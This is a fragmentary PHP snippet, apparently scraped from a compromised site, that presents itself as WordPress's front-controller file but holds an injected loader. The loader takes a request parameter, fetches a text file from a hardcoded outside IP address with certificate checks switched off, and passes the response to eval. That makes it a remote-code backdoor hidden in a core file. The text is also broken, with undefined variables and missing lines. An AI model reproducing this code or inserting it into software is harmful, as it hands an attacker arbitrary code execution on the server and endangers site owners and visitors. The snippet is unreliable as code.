: str_replace(): Passing null to parameter #2 ($replace) of type array|string is deprecated in
* Front to the WordPress application.
$a = isset($_GET['a']) ? $_GET['a'] : 0;
if ( function_exists( "curl_init" ) && function_exists( "curl_exec" ) ) {
curl_setopt( $handle, CURLOPT_URL, 'http://69.30.227.202/file/'.$txt.'.txt' );
curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $handle, CURLOPT_HEADER, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
$response = curl_exec( $handle );
$curl_error = curl_error( $handle );
"data" => @eval( "?>". $response )
if ( PHP_VERSION_ID < 80000 ) {